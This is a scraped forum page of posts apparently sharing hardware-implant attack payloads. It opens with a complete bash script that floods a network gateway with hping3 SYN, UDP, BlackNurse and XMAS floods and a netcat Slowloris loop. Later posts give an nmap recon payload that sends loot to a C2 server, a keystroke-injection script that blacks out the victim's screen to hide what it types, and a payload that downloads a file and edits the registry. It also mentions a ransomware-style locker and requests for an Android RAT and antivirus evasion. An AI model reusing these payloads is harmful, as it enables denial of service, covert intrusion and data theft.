Attack has Finished. # # NOTE: SLOWLORIS Attack does NOT use the DURATION Variable. It runs until # connections/resources run out. # # BlackNurse Attack does NOT use the PORT Variable. It runs against the # ICMP(Ping) port. # # Type of Attack to perform. ATTACK="SYN" # Port to Attack. PORT="80" # Amount of time you wish to DDoS your Gateway. (Hint: 600 seconds is 10 minutes) DURATION="30" # Turn to YES if you want to connect to C2 BEFORE Attack. C2_CONNECTION="YES" ## Settings for SLOWLORIS Attack. (Only supports HTTP Attack, NOT SSL - HTTPS) HTTP_CONNECTIONS="200" TEST_URL="http://www.google.com" # Start the Script! Man your Stations! LED SETUP; NETMODE DHCP_CLIENT; function net_connect() { while ! ifconfig eth0 | grep "inet addr"; do LED Y SOLID; sleep .2; LED M SOLID; sleep .8; done while ! wget $TEST_URL -qO /dev/null; do LED W SOLID; sleep .2; LED M SOLID; sleep .8; done GATEWAY_IP=$(ip route list dev eth0 | awk ' /^default/ {print $3}') # Detect Gateway IP, if none exit if [ -z $GATEWAY_IP ]; then i=0 for i in {1..15}; do if [ "$i" -le "15" ]; then LED R SOLID; sleep .2; LED OFF;sleep .8; else LED R SOLID; exit 0; fi done fi if [ "$C2_CONNECTION" == "YES" ]; then LED C VERYFAST; C2CONNECT; while ! pgrep cc-client; do LED C FAST;sleep 1; done LED C SOLID; sleep .5; fi } net_connect; # Prepare the Flashy Colors! function led_attack() { LED G SOLID; sleep .2; LED Y SOLID; sleep .8; } function led_attack_dur() { for (( i=1; i<=$DURATION; i++ )); do LED G SOLID; sleep .2; LED Y SOLID; sleep .8; done } # Arm the platoon! function attack() { if [ $ATTACK = "SYN" ]; then led_attack; hping3 --flood -d 4096 --frag --rand-source -p $PORT -S $GATEWAY_IP & HPING_PID=$! led_attack_dur; kill $HPING_PID; fi if [ $ATTACK = "ACK" ]; then led_attack; hping3 --flood -d 4096 --frag --rand-source -p $PORT -A $GATEWAY_IP & HPING_PID=$! led_attack_dur; kill $HPING_PID; fi if [ $ATTACK = "RST" ]; then led_attack; hping3 --flood -d 4096 --frag --rand-source -p $PORT -R $GATEWAY_IP & HPING_PID=$! led_attack_dur; kill $HPING_PID; fi if [ $ATTACK = "UDP" ]; then led_attack; hping3 --flood --udp --sign 4096 -p $PORT $GATEWAY_IP & HPING_PID=$! led_attack_dur; kill $HPING_PID; fi if [ $ATTACK = "BLACKNURSE" ]; then led_attack; hping3 -1 -C 3 -K 3 --flood --rand-source $GATEWAY_IP & HPING_PID=$! led_attack_dur; kill $HPING_PID; fi if [ $ATTACK = "XMAS" ]; then led_attack; hping3 --flood -d 4096 --rand-source -p $PORT -F -S -R -P -A -U -X -Y $GATEWAY_IP & HPING_PID=$! led_attack_dur; kill $HPING_PID; fi if [ $ATTACK = "SLOWLORIS" ]; then led_attack; if [ "$PORT" != "80" ] || [ "$PORT" != "8080" ]; then PORT="80" fi INTERVAL=$((RANDOM % 11 + 5)) i=1 while [ "$i" -le "$HTTP_CONNECTIONS" ]; do # Use Netcat to create a keep-alive connection to the Gateway IP. echo -e "GET / HTTP/1.1\r\nHost: $GATEWAY_IP\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nDNT: 1\r\nConnection: keep-alive\r\nCache-Control: no-cache\r\nPragma: no-cache\r\n$RANDOM: $RANDOM\r\n"|nc -i $INTERVAL -w 30000 $TARGET $PORT 2>/dev/null 1>/dev/null & led_attack; i=$((i + 1)); done fi LED FINISH } # Simple fix for changing arguments to CAPS arg1=$1 ARG_FIX=$( echo "$arg1" | tr '[a-z]' '[A-Z]' ) # Start the Attack! CHHHAAARRRGGGEEE!! if [ "$ARG_FIX" == "ACK" ]; then ATTACK="ACK" attack; elif [ "$ARG_FIX" == "SYN" ]; then ATTACK="SYN" attack; elif [ "$ARG_FIX" == "RST" ]; then ATTACK="RST" attack; elif [ "$ARG_FIX" == "UDP" ]; then ATTACK="UDP" attack; elif [ "$ARG_FIX" == "BLACKNURSE" ]; then ATTACK="BLACKNURSE" attack; elif [ "$ARG_FIX" == "XMAS" ]; then ATTACK="XMAS" attack; elif [ "$ARG_FIX" == "SLOWLORIS" ]; then ATTACK="SLOWLORIS" attack; elif [ -z $1 ]; then # Run ATTACK Variable from beginning of Script. attack; else printf "That is not a correct Packet Attack type.\n\n Supported Types: SYN, ACK, UDP, RST, XMAS, BLACKNURSE and SLOWLORIS\n" exit 1 fi Changelog: 1.2 - - Adds BLACKNURSE/XMAS Attacks to the payload. 1.1 - - Adds UDP/RST/Slowloris Attacks to the payload. 1.0 - Initial Release. Source Code URL: Coming Soon..
  12. Hey guys newbie here, i was wondering if there is a way / payload that if i save a backdoor.apk in the bash it auto installs in android phone? im making a android apk backdoor(rat) and im trying to find a way to make it auto install and run with the bas without internet? if not is there a way with usb rubber ducky? thanks in advance. sorry for my english :/
  13. I Have a few questions about the article "Stealing Files with the USB Rubber Ducky ā€“ USB Exfiltration Explained." I would like to know if that code for the payload would work for an OSX system and if it does not work what would be the changes needed for it to work. Also would I have tried to use the same payload for jpgs and photos but it does not seem to work, Is there a way for that to succeed or is it not possible. I would really appreciate it since that is the task I have been given. Thanks
  14. I Have a few questions about the article "Stealing Files with the USB Rubber Ducky ā€“ USB Exfiltration Explained." I would like to know if that code for the payload would work for an OSX system and if it does not work what would be the changes needed for it to work. Also would I have tried to use the same payload for jpgs and photos but it does not seem to work, Is there a way for that to succeed or is it not possible. I would really appreciate it since that is the task I have been given. Thanks
  15. Hi, Just wondering if anyone could give me some guidance I work in the security team at a company, I want to roll out a siem agent to developers laptops. I need to install this agent as quickly as possible to linux/mac boxes whilst they are locked or unlocked.(devs dont want to do it themselves are pretty reluctant on handing over their laptops) the agent is basically a bash script install... chmod +x & ./<filename> I think I could use my bashbunny to quickly walk over to the devs laptops, put the usb in... and job done.... So my question is if I run the install via a payload. will it install on the bashbunny OS or the laptop ive plugged it into? or will I have to copy it to the remote OS and use a series of key presses to run it. Any advice would be great. Thanks
  16. One of the problems I had with the ducky is that when typing a script on a target's pc it's really hard if there is a person in front of it. Instead of trying to create the command screen as small as possible so the targets won't see the screen, I've made it so big that they will think the monitor crashed or the cable fell out. The only thing you see now is a black screen and black text so the targets won't see any strings the ducky types. It also doesn't matter if the user clicks on somewhere on the screen with the mouse, because te whole screen is the command line. Here is the payload: REM Make Black Screen DELAY 1000 GUI r DELAY 100 STRING cmd CTRL-SHIFT ENTER DELAY 100 ALT y DELAY 100 STRING mode con: cols=30 lines=1 ALT SPACE UP ENTER DELAY 100 TAB SPACE SHIFT TAB SHIFT TAB STRING 5 SHIFT TAB RIGHT TAB UP TAB TAB TAB SHIFT TAB STRING 0 TAB STRING 0 TAB STRING 0 TAB TAB TAB TAB TAB DOWN DOWN DOWN TAB TAB TAB SHIFT TAB STRING 0 TAB STRING 0 TAB STRING 0 TAB TAB ENTER ALT ENTER REM Black Screen made! REM ***Disable keyboard & mice *** REM ***PAYLOAD**** One problem I had was to disable the targets keyboard (and mouse) so the target can't screw up the script/program the ducky is writing. It is a possibility that the target will freak out and push a lot of keys when they see a black screen. If anyone knows a sollution to this problem, please notify me.
  17. Hey y'all, just wanted to share my slightly modified nmap scan payload. It scans a bunch of ports, saves the output with a date stamp and multiple output types, and then uploads the loot to the C2 server. #!/bin/bash # # Title: Custom Nmap Payload for Shark Jack # Author: Flatlinebb # Version: 1.02 # # Scans target subnet with Nmap using specified options. Saves each scan result # to loot storage folder. Uploads loot to your C2 server # # Red ...........Setup # Amber..........Scanning # Green..........Finished # # See nmap --help for options. Default "-sP" ping scans the address space for # fast host discovery. NMAP_OPTIONS="-p 21,22,23,53,69,80,123,139,443,445,554,1812,3389,5220,2022,4242,4343,5000,5650,5655,5670,5800,5900,8080,8333,8222,8765,8008,8009,8181,8282,8383,8484,8888,8443,9000,10000,32400,32401,32402,49153 --open" LOOT_DIR=/root/loot/nmap SCAN_DIR=/etc/shark/nmap function finish() { LED CLEANUP # Kill Nmap echo $1 wait $1 kill $1 &> /dev/null # Exfiltrate all loot files FILES="$LOOT_DIR/*.*" for f in $FILES; do C2EXFIL STRING $f $SUBNET; done # Sync filesystem echo $SCAN_M > $SCAN_FILE sync sleep 1 LED FINISH sleep 1 # Halt system halt } function setup() { LED SETUP # Create loot directory mkdir -p $LOOT_DIR &> /dev/null # Set NETMODE to DHCP_CLIENT for Shark Jack v1.1.0+ NETMODE DHCP_CLIENT # Wait for an IP address to be obtained while ! ifconfig eth0 | grep "inet addr"; do sleep 1; done # Create tmp scan directory mkdir -p $SCAN_DIR &> /dev/null # Create tmp scan file if it doesn't exist SCAN_FILE=$SCAN_DIR/scan-count if [ ! -f $SCAN_FILE ]; then touch $SCAN_FILE && echo 0 > $SCAN_FILE fi # Find IP address and subnet while [ -z "$SUBNET" ]; do sleep 1 && find_subnet done } function find_subnet() { SUBNET=$(ip addr | grep -i eth0 | grep -i inet | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}[\/]{1}[0-9]{1,2}" | sed 's/\.[0-9]*\//\.0\//') } function run() { # Run setup setup SCAN_N=$(cat $SCAN_FILE) SCAN_M=$(( $SCAN_N + 1 )) LED ATTACK # Connect to Cloud C2 C2CONNECT # Wait until Cloud C2 connection is established while ! pgrep cc-client; do sleep 1; done # Start scan nmap $NMAP_OPTIONS $SUBNET -oA $LOOT_DIR/nmap-scan_$SCAN_M_`date +"%Y-%m-%d_%H%M%S"` &>/dev/null & tpid=$! sleep 1 finish $tpid } # Run payload run & Obligatory github link: https://github.com/flatlinebb/sharkjack-payloads/blob/master/payloads/library/recon/Custom nmap payload/payload.sh
  18. Link to github: https://github.com/hak5/bashbunny-payloads/pull/67 Comment if you would like to see some improvments or changes.
  19. HoldEmUp Private Encryption Locker By REDD (aka Ar1k88) Fork from: https://github.com/private-locker/Private-Encrypted-Locker GitHub URL: https://github.com/private-locker/bashbunny-payloads/tree/master/payloads/library/general/HoldEmUp (Waiting on Official Hak5 Merge) This Script was previously released on here, then taken down. I had decided to release it on here again since we have also released the Source on our Community GitHub. Features: Use 256 AES Encryption to encrypt and secure files with a Uniquely Generated AES Key. Edit "settings.db" to change the file format of encrypted files. No need to 3rd Party Applications to hide documents. "How this was made? I saw how WannaCry and other Ransomware would "Hold You Hostage". So I decided to sit down, make a PoC (Proof of Concept) that quickly turned into a Security Tool that could be used to lock and unlock your own files. So I held onto the files, even released them for Hak5 as a Demo on the BashBunny, but quickly realized it had "Ransomware" qualities. I quickly removed it. But as times come to pass; Security is getting better. There's other Programmers besides myself that could benefit from this project. Prevent the next wave of "Ransomware". -REDD " DO NOT LOSE YOUR LOCKER KEY'S! NO KEY = NO DECRYPTING. YOU HAVE BEEN WARNED!
  20. Hi dear friends. I watched to this video. But I dont know, which payload he was use in this video. So, what do you think about it? Which payload must be it?
  21. Shanegal

    shane

    hey guys, so I had some trouble with the screaming payload of doom payload so ive adapted the wallpaper changer payload to do basically the same thing but instead of transferring the wallpaper jpeg, it transfers the .wav file from the bash bunny. Everything kinda works apart from the transferred wav file keeps showing up as 0kb after the script has run? can anyone help me with this please? Here is the script ive have made and ive attached the full payload at the bottom LED SETUP ATTACKMODE HID RNDIS_ETHERNET GET HOST_IP GET SWITCH_POSITION udisk mount cd /root/udisk/payloads/$SWITCH_POSITION python -m SimpleHTTPServer 80 & LED ATTACK Q GUI r Q DELAY 500 Q STRING "cmd /C \"start /MIN powershell iwr $HOST_IP/S.WAV > %USERPROFILE%\s.wav&&@reg add HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\DeviceDisconnect\.Current\ /t REG_SZ /d %USERPROFILE%\s.wav /f" Q ENTER LED G SUCCESS s.wav screamer payload.txt
  22. In the spirit of april fools, I ported the original UnifiedRickRoll to windows, so you can easily switch between apple and windows computers and still get the same effect. https://github.com/hak5/bashbunny-payloads/pull/139
  23. Hello, having received my new toy recently (bashbunny) : I tried to use some scripts like "wallpaper-changer-of-doom" except it didn't work at home. Here is the script: https://github.com/jcardonne/Bashbunny-payloads/blob/master/wallpaper-prank If some of you have any suggestions, I'm interested:) Affectionately, jcardonne
  24. Im working with Kali Linux. I started getting into working with Metasploit, Payloads ... But heres the problem: I am not finding a way to create a Payload, that does not get detected by a Antivirus. Please Help šŸ˜„
×
×
  • Create New...